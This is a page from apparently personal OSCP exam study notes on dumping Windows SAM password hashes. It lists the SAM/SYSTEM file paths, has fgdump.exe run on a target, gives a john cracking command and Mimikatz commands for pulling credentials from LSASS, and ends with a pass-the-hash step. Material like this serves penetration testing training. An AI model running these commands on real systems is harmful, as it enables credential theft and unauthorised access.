OSCP Notes
  • Introduction
  • Port Scanning
  • Nmap Port Scanning
  • Nmap Scripts
  • Services Enumeration
    • SMB Enumeration (Port 139, 445)
    • SNMP Enumeraion (Port 161)
    • NFS Enumeration (Port 111, 2049)
    • SMTP Enumeration (Port 25)
    • DNS Enumeration (Port 53)
    • POP3 (Port 110, 25*)
    • MySQL (Port 3306)
    • Oracle (Port 1521)
    • MsSQL (Port 1433)
  • Web / HTTP
    • Web Scanning
    • CMS
    • Directory Fuzzing
    • File Upload
      • Bypass file upload filtering
      • Bruteforcing extensions
      • WebDAV
    • Bruteforce Authentication
    • LFI and RFI
      • Interesting Files for LFI
      • Null Byte Injection
      • PHP Wrappers
    • ShellShock
    • Post Requests
  • password attacks
    • Brute-force service password
    • Cracking Password
    • Custom Worldlist
  • Exploitaion
    • Searchsploit
    • Compiling the Exploit
  • shell
    • Bind and Reverse shell
    • Upgrading shell
    • msfvenom
  • Linux Post Exploitation
    • Linux Manual Exploitation
    • Linux post exploitation scripts
    • Kernel Exploitation
  • windows post exploitation
    • General
    • Manual Exploitaion
    • Dumping the sam file
    • SUDO SU
    • Automated enumeration script
    • Windows Exploit Suggester
  • file transfer
    • General
    • Linux
    • Windows
  • cheatsheets
    • Command injection Cheatsheet
    • Find Command Cheatsheet
    • Netcat
    • SQL Injection Bypass
    • CheckList
    • XSS Payload
Powered by GitBook
On this page
  • SAM/SYSTEM Locations
  • Extracting Password hashes from SAM file
  • fgdump.exe
  • Cracking hashes with john
  • Mimikatz (Need Admin Access)
  1. windows post exploitation

Dumping the sam file

Windows stores password hashes in the Security Account Manager (SAM).

The hashes are encrypted with a key which can be found in a file named SYSTEM.

If you have the ability to read the SAM and SYSTEM files, you can extract the hashes. A very common way of capturing hashed passwords on older Windows systems is to dump the Security Account Manager (SAM) file. The Security Account Manager is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores user passwords. It can be used to authenticate local and remote users on the system.

SAM/SYSTEM Locations

C:\Windows\System32\config

C:\Windows\Repair 
C:\Windows\System32\config\RegBack
# Backup files , can be found

Extracting Password hashes from SAM file

The SAM file cannot be accessed directly while Windows is running because it’s locked by the Windows operating system. However, there are several tools available for extracting the password hashes from memory such as pwdump, fgdump and, if you have a Meterpreter session on the system (or you set one up), you can also use the hashdump post-exploitation module.

fgdump.exe

/usr/share/windows/windows-binaries/fgdump/fgdump.exe

Transfer it to target and run it , and '127.0.0.pwdump' file will created in the same directory with hashes inside it

Cracking hashes with john 

john --wordlist=/usr/share/john/password.lst /root/Desktop/hashes.txt

Mimikatz (Need Admin Access)

Executing mimikatz

mimikatz.exe -m

Extracting password with sekurlsa

To interact with LSASS and capture credentials from memory, Mimikatz needs:

  • An administrator account to get debug privileges via privilege::debug, or;

  • A SYSTEM account via post exploitation/privilege escalation. In this case the debug privilege is not necessary.

$ privilege::debug

Privilege ‘20’ OK

When the user account that is running Mimikatz does not have administrative privileges and is therefore unable to access the LSASS service, Mimikatz will throw the following error:

Error: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

Note: If you’re running the debug command on a shell as NT AUTHORITY/SYSTEM, Mimikatz will also throw an error but it won’t prevent you from accessing LSASS with Mimikatz to dump credentials:

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000022 

lsadump::sam

sekurlsa::logonpasswords

We can use this dumped hashes with pth-winexe to gain access

PreviousManual ExploitaionNextSUDO SU

Last updated 3 years ago